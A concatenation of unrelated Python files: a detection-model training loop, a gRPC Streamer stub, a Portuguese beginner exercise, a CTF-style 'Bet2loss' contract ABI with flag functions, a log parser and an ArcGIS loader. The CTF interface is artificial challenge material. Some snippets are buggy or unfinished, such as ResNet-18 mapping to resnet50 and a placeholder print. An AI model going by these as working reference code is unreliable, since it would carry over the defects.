if get_rank() == 0:
pbar.set_description(
(
f'epoch: {epoch + 1}; cls: {loss_cls:.4f}; '
f'box: {loss_box:.4f}; center: {loss_center:.4f}'
)
)
# writing log to tensorboard
if logger and idx % 50 == 0:
lr_rate = optimizer.param_groups[0]['lr']
totalStep = (epoch * len(loader) + idx) * args.batch * args.n_gpu
logger.add_scalar('training/loss_cls', loss_cls, totalStep)
logger.add_scalar('training/loss_box', loss_box, totalStep)
logger.add_scalar('training/loss_center', loss_center, totalStep)
logger.add_scalar('training/loss_all', (loss_cls + loss_box + loss_center), totalStep)
logger.add_scalar('learning_rate',lr_rate,totalStep)
epoch_loss.append(float(loss_cls+loss_box+loss_center))
if logger:
logger.add_scalar('training/loss_epoch_all',np.mean(epoch_loss),epoch)
return epoch_loss
def data_sampler(dataset, shuffle, distributed):
if distributed:
return DistributedSampler(dataset, shuffle=shuffle)
if shuffle:
return sampler.RandomSampler(dataset)
else:
return sampler.SequentialSampler(dataset)
def save_checkpoint(model,args,optimizer,epoch):
if get_rank() == 0:
torch.save(
{'model': model.module.state_dict(), 'optim': optimizer.state_dict()},
args.working_dir + f'/epoch-{epoch + 1}.pt',
)
if __name__ == '__main__':
cv2.setNumThreads(0)
cv2.ocl.setUseOpenCL(False)
args = get_args()
# Create working directory for saving intermediate results
working_dir = args.working_dir
if not os.path.exists(working_dir):
os.makedirs(working_dir)
logger = SummaryWriter(working_dir)
n_gpu = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1
args.n_gpu = n_gpu
args.distributed = n_gpu > 1
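    # WORLD_SIZE is injected by the distributed launcher; a typical multi-GPU run is
    # assumed to look like the following (flag names depend on get_args()):
    #   python -m torch.distributed.launch --nproc_per_node=4 train.py --batch 8 --working_dir runs/atss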
if args.distributed:
torch.cuda.set_device(args.local_rank)
torch.distributed.init_process_group(backend='gloo', init_method='env://')
#torch.distributed.init_process_group(backend='nccl', init_method='env://')
synchronize()
device = 'cuda'
# train_trans = transform.Compose(
# [
# transform.RandomResize(args.train_min_size_range, args.train_max_size),
# transform.RandomHorizontalFlip(0.5),
# transform.ToTensor(),
# transform.Normalize(args.pixel_mean, args.pixel_std)
# ]
# )
# for efficientdet resize the image
train_trans = transform.Compose(
[
transform.RandomHorizontalFlip(0.5),
transform.Resize_For_Efficientnet(compund_coef=args.backbone_coef),
transform.ToTensor(),
transform.Normalize(args.pixel_mean, args.pixel_std),
]
)
valid_trans = transform.Compose(
[
transform.Resize_For_Efficientnet(compund_coef=args.backbone_coef),
transform.ToTensor(),
transform.Normalize(args.pixel_mean, args.pixel_std)
]
)
train_set = COCODataset(args.path, 'train', train_trans)
train_loader = DataLoader(
train_set,
batch_size=args.batch,
sampler=data_sampler(train_set, shuffle=True, distributed=args.distributed),
num_workers=args.num_workers,
collate_fn=collate_fn(args),
)
valid_set = COCODataset(args.path, 'val', valid_trans)
valid_loader = DataLoader(
valid_set,
batch_size=args.batch,
sampler=data_sampler(valid_set, shuffle=False, distributed=args.distributed),
num_workers=args.num_workers,
collate_fn=collate_fn(args),
)
if args.val_with_loss:
valid_loss_set = COCODataset(args.path, 'val_loss', valid_trans)
val_loss_loader = DataLoader(
valid_loss_set,
batch_size=args.batch,
sampler=data_sampler(valid_loss_set, shuffle=False, distributed=args.distributed),
num_workers=args.num_workers,
collate_fn=collate_fn(args),
)
# backbone = vovnet39(pretrained=True)
# backbone = vovnet57(pretrained=True)
# backbone = resnet18(pretrained=True)
# backbone = resnet50(pretrained=True)
# backbone = resnet101(pretrained=True)
# model = ATSS(args, backbone)
if args.backbone_type == 'Efficientdet':
if args.load_pretrained_weight:
model = Efficientnet_Bifpn_ATSS(args,compound_coef=args.backbone_coef,load_backboe_weight=True,weight_path=args.weight_path)
else:
model = Efficientnet_Bifpn_ATSS(args,compound_coef=args.backbone_coef,load_backboe_weight=False)
elif args.backbone_type == 'ResNet':
if args.backbone_coef == 18:
backbone = resnet50(pretrained=True)
elif args.backbone_coef == 50:
backbone = resnet50(pretrained=True)
elif args.backbone_coef == 101:
backbone = resnet101(pretrained=True)
else:
raise NotImplementedError(f'Not supported backbone name :{args.backbone_name}')
model = ATSS(args, backbone)
elif args.backbone_type == 'VovNet':
if args.backbone_coef == 39:
backbone = vovnet39(pretrained=True)
elif args.backbone_coef == 57:
backbone = vovnet57(pretrained=True)
else:
raise NotImplementedError(f'Not supported backbone name :{args.backbone_name}')
model = ATSS(args, backbone)
else:
raise NotImplementedError(f'Not supported backbone name :{args.backbone_name}')
model = model.to(device)
if args.load_checkpoint:
model.load_state_dict(torch.load(args.weight_path,map_location='cpu')['model'])
print(f'[INFO] load checkpoint weight successfully!')
# freeze backbone and FPN if train head_only
if args.head_only:
def freeze_backbone(m):
classname = m.__class__.__name__
for ntl in ['EfficientNet', 'BiFPN','FPN','FPNTopP6P7','ResNet']:
if ntl == classname:
for param in m.parameters():
param.requires_grad = False
model.apply(freeze_backbone)
print('[Info] freezed backbone')
if not args.head_only and args.finetune:
# if not freeze the backbone, then finetune the backbone,
optimizer = optim.SGD(
model.backbone.backbone_net.parameters(),
lr = 0,
momentum = 0.9,
weight_decay = 0.0001,
nesterov = True,
)
optimizer.add_param_group({'params':list(model.backbone.bifpn.parameters()),'lr':0,
'momentum': 0.9, 'weight_decay': 0.0001, 'nesterov': True})
optimizer.add_param_group({'params':list(model.head.parameters()),'lr':0,'momentum':0.9,'weight_decay':0.0001,
'nesterov':True})
print(f'[INFO] efficientnet use the lr :{args.lr*args.lr_gamma_Efficientnet} to finetune,'
f' bifpn use the lr:{args.lr*args.lr_gamma_BiFPN} to finetune')
else:
optimizer = optim.SGD(
model.parameters(),
lr=args.lr,
momentum=0.9,
weight_decay=0.0001,
nesterov=True,
)
if args.load_checkpoint:
optimizer.load_state_dict(torch.load(args.weight_path)['optim'])
last_epoch = int(os.path.basename(args.weight_path).split('.')[0][6:])
print(f'[INFO] load optimizer state:{last_epoch}')
last_epoch = last_epoch - 1
else:
last_epoch = -1
# scheduler = optim.lr_scheduler.MultiStepLR(
# optimizer, milestones=args.lr_steps, gamma=args.lr_gamma,last_epoch=last_epoch
# )
#scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer,factor=args.lr_gamma, patience=3,verbose=True)
iter_per_epoch = iter_per_epoch_cal(args, train_set)
scheduler = GluonLRScheduler(optimizer,mode='step',nepochs=(args.epoch-args.warmup_epoch),
iters_per_epoch=iter_per_epoch,step_epoch=[9,11])
warmup_scheduler, schdeduler = set_schduler_with_wormup(args,iter_per_epoch,optimizer,scheduler)
ema = EMA(model,decay=0.999,enable=args.EMA)
if args.distributed:
# if args.batch <= 4:
# #if the batchsize for a single GPU <= 4, then use the sync_batchnorm
# world_size = get_world_size()
# rank = get_rank()
# sync_groups = world_size // args.n_gpu
# process_group = simple_group_split(world_size, rank, sync_groups)
# convert_sync_bn(model, process_group)
model = nn.parallel.DistributedDataParallel(
model,
device_ids=[args.local_rank],
output_device=args.local_rank,
broadcast_buffers=False,
)
train_loader = DataLoader(
train_set,
batch_size=args.batch,
sampler=data_sampler(train_set, shuffle=True, distributed=args.distributed),
num_workers=args.num_workers,
collate_fn=collate_fn(args),
)
valid_loader = DataLoader(
valid_set,
batch_size=args.batch,
sampler=data_sampler(valid_set, shuffle=False, distributed=args.distributed),
num_workers=args.num_workers,
collate_fn=collate_fn(args),
)
print(f'[INFO] Start training: learning rate:{args.lr}, total batchsize:{args.batch*get_world_size()}, '
f'working dir:{args.working_dir}')
logger.add_text('exp_info',f'learning_rate:{args.lr},total_batchsize:{args.batch*get_world_size()},'
f'backbone_name:{args.backbone_name},freeze_backbone:{args.head_only},'
f'finetune_backbone:{args.finetune}')
if args.finetune:
logger.add_text('exp_info',f'efficientnet lr gamma:{args.lr_gamma_Efficientnet},'
f'BiFPN lr gamma:{args.lr_gamma_BiFPN}')
val_best_loss = 1e5
val_best_epoch = 0
for epoch in range(args.epoch-(last_epoch+1)):
epoch += (last_epoch + 1)
epoch_loss = train(args, epoch, train_loader, model, optimizer, device, [scheduler,warmup_scheduler],
logger=logger,ema=ema)
save_checkpoint(model,args,optimizer,epoch)
valid(args, epoch, valid_loader, valid_set, model, device, logger=logger,ema=None)
if args.val_with_loss and epoch > 1 and epoch % 2 ==0:
val_epoch_loss = valid_loss(args,epoch,val_loss_loader,valid_loss_set,model,device,logger=logger)
if args.early_stopping :
if val_epoch_loss < val_best_loss:
val_best_loss = val_epoch_loss
val_best_epoch = epoch
                if epoch - val_best_epoch > args.es_patience:
                    print(f'[INFO]Stop training at epoch {epoch}. The lowest validation loss achieved is {val_best_loss}')
                    save_checkpoint(model,args,optimizer,epoch)
                    break
# scheduler.step(np.mean(epoch_loss)) |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from orc8r.protos import streamer_pb2 as orc8r_dot_protos_dot_streamer__pb2
class StreamerStub(object):
"""Streamer provides a pipeline for the cloud to push the updates to the
gateway as and when the update happens.
The Streamer interface defines the semantics and consistency guarantees
between the cloud and the gateway while abstracting the details of how
it's implemented in the cloud and what the gateway does with the updates.
- The gateways call the GetUpdates() streaming API with a StreamRequest
indicating the stream name and the offset to continue streaming from.
- The cloud sends a stream of DataUpdateBatch containing a batch of updates.
- If resync is true, then the gateway can cleanup all its data and add
all the keys (the batch is guaranteed to contain only unique keys).
- If resync is false, then the gateway can update the keys, or add new
ones if the key is not already present.
- Key deletions are not yet supported (#15109350)
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetUpdates = channel.unary_stream(
'/magma.orc8r.Streamer/GetUpdates',
request_serializer=orc8r_dot_protos_dot_streamer__pb2.StreamRequest.SerializeToString,
response_deserializer=orc8r_dot_protos_dot_streamer__pb2.DataUpdateBatch.FromString,
)
class StreamerServicer(object):
"""Streamer provides a pipeline for the cloud to push the updates to the
gateway as and when the update happens.
The Streamer interface defines the semantics and consistency guarantees
between the cloud and the gateway while abstracting the details of how
it's implemented in the cloud and what the gateway does with the updates.
- The gateways call the GetUpdates() streaming API with a StreamRequest
indicating the stream name and the offset to continue streaming from.
- The cloud sends a stream of DataUpdateBatch containing a batch of updates.
- If resync is true, then the gateway can cleanup all its data and add
all the keys (the batch is guaranteed to contain only unique keys).
- If resync is false, then the gateway can update the keys, or add new
ones if the key is not already present.
- Key deletions are not yet supported (#15109350)
"""
def GetUpdates(self, request, context):
"""GetUpdates streams config updates from the cloud.
The RPC call would be kept open to push new updates as they happen.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_StreamerServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetUpdates': grpc.unary_stream_rpc_method_handler(
servicer.GetUpdates,
request_deserializer=orc8r_dot_protos_dot_streamer__pb2.StreamRequest.FromString,
response_serializer=orc8r_dot_protos_dot_streamer__pb2.DataUpdateBatch.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'magma.orc8r.Streamer', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Streamer(object):
"""Streamer provides a pipeline for the cloud to push the updates to the
gateway as and when the update happens.
The Streamer interface defines the semantics and consistency guarantees
between the cloud and the gateway while abstracting the details of how
it's implemented in the cloud and what the gateway does with the updates.
- The gateways call the GetUpdates() streaming API with a StreamRequest
indicating the stream name and the offset to continue streaming from.
- The cloud sends a stream of DataUpdateBatch containing a batch of updates.
- If resync is true, then the gateway can cleanup all its data and add
all the keys (the batch is guaranteed to contain only unique keys).
- If resync is false, then the gateway can update the keys, or add new
ones if the key is not already present.
- Key deletions are not yet supported (#15109350)
"""
@staticmethod
def GetUpdates(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_stream(request, target, '/magma.orc8r.Streamer/GetUpdates',
orc8r_dot_protos_dot_streamer__pb2.StreamRequest.SerializeToString,
orc8r_dot_protos_dot_streamer__pb2.DataUpdateBatch.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
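# Hedged usage sketch (assumes an orc8r endpoint is reachable at the given address and
# that this generated module is importable; both are assumptions):
#   channel = grpc.insecure_channel('localhost:50051')
#   stub = StreamerStub(channel)
#   request = orc8r_dot_protos_dot_streamer__pb2.StreamRequest()  # populate the stream name as needed
#   for update_batch in stub.GetUpdates(request):
#       ...  # apply the DataUpdateBatch to local state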
|
# Desafio044:
valor_da_compra = float(input('valor da compra? '))
forma_de_pg = input('Qual a forma de pagamento? \033[1:31mD\033[m para dinheiro ou \033[1:31mC\033[m para cartão ').strip().upper()
if forma_de_pg == 'D':
    print(f'Pagamento a vista em dinheiro voce tem desconto de 10% e o valor final sera de {(valor_da_compra/100)*90:.2f}')
elif forma_de_pg == 'C':
    quantivezes = input('pagamento sera a vista? \033[1:31mS\033[m ou \033[1:31mN\033[m ').strip().upper()
    if quantivezes == 'S':
        print('dfghfhf')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2018/11/4 22:48
# @Author : LoRexxar
# @File : bet2loss_abi.py
# @Contact : [email protected]
Bet2lossABI = [
{
"anonymous": False,
"inputs": [
{
"indexed": False,
"name": "b64email",
"type": "string"
},
{
"indexed": False,
"name": "back",
"type": "string"
}
],
"name": "GetFlag",
"type": "event"
},
{
"constant": False,
"inputs": [
{
"name": "b64email",
"type": "string"
}
],
"name": "PayForFlag",
"outputs": [
{
"name": "success",
"type": "bool"
}
],
"payable": True,
"stateMutability": "payable",
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "betMask",
"type": "uint256"
},
{
"name": "modulo",
"type": "uint256"
},
{
"name": "betnumber",
"type": "uint256"
},
{
"name": "commitLastBlock",
"type": "uint256"
},
{
"name": "commit",
"type": "uint256"
},
{
"name": "r",
"type": "bytes32"
},
{
"name": "s",
"type": "bytes32"
},
{
"name": "v",
"type": "uint8"
}
],
"name": "placeBet",
"outputs": [],
"payable": True,
"stateMutability": "payable",
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "newSecretSigner",
"type": "address"
}
],
"name": "setSecretSigner",
"outputs": [],
"payable": False,
"stateMutability": "nonpayable",
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "reveal",
"type": "uint256"
}
],
"name": "settleBet",
"outputs": [],
"payable": False,
"stateMutability": "nonpayable",
"type": "function"
},
{
"constant": False,
"inputs": [
{
"name": "_to",
"type": "address"
},
{
"name": "_value",
"type": "uint256"
}
],
"name": "transfer",
"outputs": [
{
"name": "success",
"type": "bool"
}
],
"payable": False,
"stateMutability": "nonpayable",
"type": "function"
},
{
"inputs": [],
"payable": False,
"stateMutability": "nonpayable",
"type": "constructor"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "beneficiary",
"type": "address"
},
{
"indexed": False,
"name": "amount",
"type": "uint256"
}
],
"name": "Payment",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": True,
"name": "beneficiary",
"type": "address"
},
{
"indexed": False,
"name": "amount",
"type": "uint256"
}
],
"name": "FailedPayment",
"type": "event"
},
{
"anonymous": False,
"inputs": [
{
"indexed": False,
"name": "commit",
"type": "uint256"
}
],
"name": "Commit",
"type": "event"
},
{
"constant": True,
"inputs": [],
"name": "_airdropAmount",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "_totalSupply",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "owner",
"type": "address"
}
],
"name": "balanceOf",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [
{
"name": "",
"type": "address"
}
],
"name": "balances",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "decimals",
"outputs": [
{
"name": "",
"type": "uint8"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "INITIAL_SUPPLY",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "jackpotSize",
"outputs": [
{
"name": "",
"type": "uint128"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "lockedInBets",
"outputs": [
{
"name": "",
"type": "uint128"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "maxProfit",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "name",
"outputs": [
{
"name": "",
"type": "string"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "owner",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "secretSigner",
"outputs": [
{
"name": "",
"type": "address"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "symbol",
"outputs": [
{
"name": "",
"type": "string"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
},
{
"constant": True,
"inputs": [],
"name": "totalSupply",
"outputs": [
{
"name": "",
"type": "uint256"
}
],
"payable": False,
"stateMutability": "view",
"type": "function"
}
]
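# Hedged usage sketch (assumes web3.py is installed and that contract_address points at
# a deployed Bet2loss instance; both are assumptions):
#   from web3 import Web3
#   w3 = Web3(Web3.HTTPProvider('http://127.0.0.1:8545'))
#   bet2loss = w3.eth.contract(address=contract_address, abi=Bet2lossABI)
#   print(bet2loss.functions.maxProfit().call())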
|
import time
import glob
import os
import types
import socket
def read_paths ():
fulllist = []
for file in glob.glob("*96*messages"):
print 'reading ' + file
fullfile = (open(file).read().splitlines())
for x in fullfile:
if 'RPD_MPLS_LSP_CHANGE'in x and 'Sep 17' in x:
if 'flag' in x:
fulllist.append(x.split())
print 'done reading'
return fulllist
newpaths=read_paths()
dnsdict = {}
def convert_paths (newpaths):
convertedpaths = []
dnsfile = (open("/home/mkasten/configs/addresses.txt").read().splitlines())
for x in dnsfile:
if '96c'in x or 'ibr' in x or '96l' in x or '20lsr' in x :
dnsdict[x.split(":")[0]] = x.split(":")[1] +" " + x.split(":")[2]
for x in newpaths:
z = [x[8],x[12]]
for y in x:
            if 'flag=0x2' in y:
                rest = y.split('(',1)[0]
                if rest not in dnsdict:
                    # resolve unknown addresses via reverse DNS and cache the result
                    try :
                        a = socket.gethostbyaddr(rest)[0]
                    except :
                        print "Unknown : " + rest
                        a = rest
                    dnsdict[rest] = a
                    z.append(a)
                    z.append(a.split('.',1)[0])
                else:
                    z.append(dnsdict[rest])
convertedpaths.append(z)
print 'done converting'
return convertedpaths
listofresignals = convert_paths(newpaths)
filename = 'resignallists'
outputfile = open(filename,'w')
print 'starting write'
for resig in listofresignals:
outputfile.write( ' '.join(resig) +'\n')
|
"""
For documentation on this script, run with -h flag
"""
import sys
import os
import time
import logging
import openpyxl
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from datetime import datetime as dt
class ArcPyLogHandler(logging.StreamHandler):
"""
Custom logging class that bounces messages to the arcpy tool window as well
as reflecting back to the file.
"""
def emit(self, record):
"""
Write the log message
"""
try:
msg = record.msg.format(record.args)
except:
msg = record.msg
if record.levelno == logging.ERROR:
arcpy.AddError(msg)
elif record.levelno == logging.WARNING:
arcpy.AddWarning(msg)
elif record.levelno == logging.INFO:
arcpy.AddMessage(msg)
else:
arcpy.AddMessage(msg)
super(ArcPyLogHandler, self).emit(record)
def run_app():
input_xls, smm_fc, mg_fc, logger = get_input_parameter()
append_scanned_maps(input_xls, smm_fc, mg_fc, logger)
def get_input_parameter():
try:
# Parse arguments
parser = ArgumentParser(description='This script appends new polygons to the Scanned Maps Master feature '
'class based on a specified Scanned Map Input Excel file.',
formatter_class=RawTextHelpFormatter)
parser.add_argument('xls', help='Input Scanned Map Input Excel file')
parser.add_argument('sfc', help='Scanned Maps Master feature class')
parser.add_argument('mfc', help='Mapsheet Grid feature class')
parser.add_argument('--log_level', default='INFO', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR'],
help='Log level')
parser.add_argument('--log_dir', help='Path to log Directory')
args = parser.parse_args()
log_name = 'main_logger'
logger = logging.getLogger(log_name)
logger.handlers = []
log_fmt = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
log_file_base_name = os.path.basename(sys.argv[0])
log_file_extension = 'log'
timestamp = dt.now().strftime('%Y-%m-%d_%H-%M-%S')
log_file = "{}_{}.{}".format(timestamp, log_file_base_name, log_file_extension)
logger.setLevel(args.log_level)
sh = logging.StreamHandler()
sh.setLevel(args.log_level)
sh.setFormatter(log_fmt)
logger.addHandler(sh)
if args.log_dir:
try:
os.makedirs(args.log_dir)
except OSError:
pass
fh = logging.FileHandler(os.path.join(args.log_dir, log_file))
fh.setLevel('DEBUG')
fh.setFormatter(log_fmt)
logger.addHandler(fh)
if os.path.basename(sys.executable).lower() == 'python.exe':
arc_env = False
else:
arc_env = True
if arc_env:
arc_handler = ArcPyLogHandler()
arc_handler.setLevel(args.log_level)
arc_handler.setFormatter(log_fmt)
logger.addHandler(arc_handler)
# Start the script
return args.xls, args.sfc, args.mfc, logger
except Exception as e:
print('Unexpected exception. Program terminating.')
exit(1)
def append_scanned_maps(input_xls, smm_fc, mg_fc, logger):
if not os.path.isfile(input_xls):
logger.error('Specified input Excel file does not exist. Exiting script.')
sys.exit(100)
if not arcpy.Exists(smm_fc):
logger.error('Specified Scanned Maps Master feature class does not exist. Exiting script.')
sys.exit(100)
smm_fc_f = [f.name for f in arcpy.ListFields(smm_fc) if not f.required]
if 'FILE_NAME' not in smm_fc_f:
logger.error('Specified Scanned Maps Master feature class does not contain required field FILE_NAME. Exiting '
'script.')
sys.exit(100)
if not arcpy.Exists(mg_fc):
logger.error('Specified Mapsheet Grid feature class does not exist. Exiting script.')
sys.exit(100)
mg_fc_f = [f.name for f in arcpy.ListFields(mg_fc) if not f.required]
if 'MAP_TILE' not in mg_fc_f:
logger.error('Specified Mapsheet Grid feature class does not contain required field MAP_TILE. Exiting script.')
sys.exit(100)
try:
logger.info('Loading Excel file')
wb = openpyxl.load_workbook(input_xls)
except:
logger.error('Specified input file is not a valid Excel file. Exiting script.')
sys.exit(100)
sheet_name = 'Data_Entry_Template'
try:
sheet = wb.get_sheet_by_name(sheet_name)
except:
logger.error('Input Excel file does not contain required worksheet {}. Exiting script.'.format(sheet_name))
sys.exit(100)
alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
columns = []
for letter in alphabet:
columns.append(letter)
for letter1 in alphabet:
for letter2 in alphabet:
columns.append(letter1 + letter2)
xls_head_col_dict = {}
for column in columns:
header = sheet["{}1".format(column)].value
if header in ["", None]:
break
else:
xls_head_col_dict[header] = column
if 'MAPSH_LST' not in xls_head_col_dict.keys():
logger.error('Input Excel file does not contain required field MAPSH_LST. Exiting script.')
sys.exit(100)
smm_field_dict = {}
for smm_field in arcpy.ListFields(smm_fc):
if not smm_field.required:
smm_field_dict[smm_field.name] = {'TYPE': smm_field.type, 'LENGTH': smm_field.length}
# Determine the fields that the Excel file and smm_fc have in common. Alert the user about
# mismatched/missing field names.
common_fields = list(set.intersection(set(xls_head_col_dict.keys()), set(smm_field_dict.keys())))
xls_fields_unmatched = list(set(xls_head_col_dict.keys()).difference(set(smm_field_dict.keys())))
smm_fields_unmatched = list(set(smm_field_dict.keys()).difference(set(xls_head_col_dict.keys())))
if len(xls_fields_unmatched) > 0:
logger.warning('Fields found in Excel file that are not in Scanned Maps Master:')
for field in xls_fields_unmatched:
logger.warning(' - {}'.format(field))
if len(smm_fields_unmatched) > 0:
logger.warning('Fields found in Scanned Maps Master that are not in Excel file:')
for field in smm_fields_unmatched:
logger.warning(' - {}'.format(field))
# Read the MAPSH_LST column of the Excel table and compile a list of all mapsheets we will need to find
# the geometry for.
mapsh_geom_dict = {}
mapsh_list = []
xls_row = 1
xls_row_empty = False
mapsh_col = xls_head_col_dict['MAPSH_LST']
logger.info('Reading mapsheet labels from MAPSH_LST column of Excel file')
while not xls_row_empty:
xls_row += 1
if sheet["A{}".format(xls_row)].value in ['', None]:
xls_row_empty = True
logger.debug('Row {} of Excel table is empty.'.format(xls_row))
else:
mapsh_value = str(sheet['{}{}'.format(mapsh_col, xls_row)].value).replace('None', '').replace(' ', '')
for mapsh in mapsh_value.split(','):
mapsh_geom_dict[mapsh] = []
mapsh_list.append(mapsh)
logger.debug('Found {} unique mapsheets listed in column {} of Excel table'.format(len(mapsh_geom_dict.keys()),
mapsh_col))
# Read the geometries of each mapsheet found above from the mapsheet grid feature class
cfl = ['MAP_TILE', 'SHAPE@']
row_count = 0
row_total = int(arcpy.GetCount_management(mg_fc).getOutput(0))
found_count = 0
logger.info('Reading {} geometries from {}'.format(len(mapsh_geom_dict.keys()), mg_fc))
for row in arcpy.da.SearchCursor(mg_fc, cfl):
row_count += 1
try:
mapsh_geom_dict[row[0]].append(row[1])
except:
pass
if row_count % 100000 == 0 or row_count == row_total:
found_count = len([mapsh for mapsh in mapsh_geom_dict.keys() if len(mapsh_geom_dict[mapsh]) > 0])
logger.debug(' Read {} of {} rows, found {} of {} mapsheets'.format(row_count, row_total, found_count,
len(mapsh_geom_dict.keys())))
invalid_mapsheets = []
for mapsh in mapsh_geom_dict.keys():
if mapsh_geom_dict[mapsh] == []:
invalid_mapsheets.append(mapsh)
if len(invalid_mapsheets) > 0:
logger.error('Some mapsheets listed in MAPSH_LST column of Excel file are not found in BC Grid feature class:')
# for invalid_mapsheet in invalid_mapsheets:
# logger.error(invalid_mapsheet)
for mapsh in mapsh_list:
if len(mapsh_geom_dict[mapsh]) == 0:
logger.error(' - {} NOT FOUND'.format(mapsh))
else:
logger.error(' - {} found'.format(mapsh))
sys.exit(100)
# Define the cfl (cursor field list)
cfl = []
for common_field in common_fields:
cfl.append(common_field)
cfl.append("SHAPE@")
# Loop through the Excel table and create a new feature (a list of attributes) for each row
xls_row = 1
xls_row_empty = False
new_smm_rows = []
invalid_values = []
logger.info('Reading Excel table')
while not xls_row_empty:
xls_row += 1
logger.debug('Reading row {} of Excel table'.format(xls_row))
if sheet["A{}".format(xls_row)].value in ['', None]:
xls_row_empty = True
logger.debug('Row {} of Excel table is empty.'.format(xls_row))
else:
new_smm_row = []
for common_field in common_fields:
xls_col = xls_head_col_dict[common_field]
value = sheet["{}{}".format(xls_col, xls_row)].value
logger.debug("Excel sheet cell {}{} has value {}".format(xls_col, xls_row, value))
# Currently the Scanned Maps Master feature class only has string, long int and short int fields,
# so we will only validate for those field types.
if smm_field_dict[common_field]['TYPE'] == 'SmallInteger':
if value in ['', None]:
new_smm_row.append(None)
else:
try:
                            x = int(value)
                            if -32768 <= x <= 32767:
                                new_smm_row.append(x)
else:
new_smm_row.append(None)
invalid_values.append("{}{}".format(xls_col, xls_row))
except:
new_smm_row.append(None)
invalid_values.append("{}{}".format(xls_col, xls_row))
elif smm_field_dict[common_field]['TYPE'] == 'Integer':
if value in ['', None]:
new_smm_row.append(None)
else:
try:
                            x = int(value)
                            if -2147483648 <= x <= 2147483647:
                                new_smm_row.append(x)
else:
new_smm_row.append(None)
invalid_values.append("{}{}".format(xls_col, xls_row))
except:
new_smm_row.append(None)
invalid_values.append("{}{}".format(xls_col, xls_row))
elif smm_field_dict[common_field]['TYPE'] == 'String':
if value in ['', None]:
new_smm_row.append('')
elif len(str(value)) <= smm_field_dict[common_field]['LENGTH']:
new_smm_row.append(str(value))
else:
new_smm_row.append(None)
invalid_values.append("{}{}".format(xls_col, xls_row))
logger.debug('New row will look like {}'.format(new_smm_row))
# Now grab the geometry from the dictionary mapsh_geom_dict[mapsh][0] (it's a list of one geometry object)
mapsh_col = xls_head_col_dict['MAPSH_LST']
value = str(sheet['{}{}'.format(mapsh_col, xls_row)].value).replace('None', '').replace(' ', '')
if ',' not in value:
mapsh_geom = mapsh_geom_dict[value][0]
else:
mapsh_geom = mapsh_geom_dict[value.split(',')[0]][0]
for mapsh in value.split(',')[1:]:
mapsh_geom = mapsh_geom.union(mapsh_geom_dict[mapsh][0])
new_smm_row.append(mapsh_geom)
new_smm_rows.append(new_smm_row)
logger.debug('Processed {} rows of Excel table'.format(xls_row))
    if len(invalid_values) > 0:
        logger.error('Invalid values found in the following Excel sheet cells: {}'.format(
            str(invalid_values).replace('[', '').replace(']', '').replace("'", '')))
        sys.exit(100)
icursor = arcpy.da.InsertCursor(smm_fc, cfl)
logger.debug('Initiating InsertCursor with the following fields:')
for f in cfl:
logger.debug(' - {}'.format(f))
logger.info('Inserting {} new rows into Scanned Maps Master feature class.'.format(len(new_smm_rows)))
for new_smm_row in new_smm_rows:
icursor.insertRow(new_smm_row)
if __name__ == '__main__':
try:
# Import arcpy
import arcpy
    except ImportError:
logging.error('No ArcGIS licenses available to run this tool. Program terminating.')
sys.exit(1)
run_app()
else:
try:
# Import arcpy
import arcpy
    except ImportError:
logging.error('No ArcGIS licenses available to run this tool. Program terminating.')
sys.exit(1)
|
import torch.nn as nn
import torch.optim as optim
from torchvision.transforms import ToTensor
from cifar_pipeline.dataset import CIFARImagesDataset, CIFARTargetsDataset
from pipeline.config_base import ConfigBase
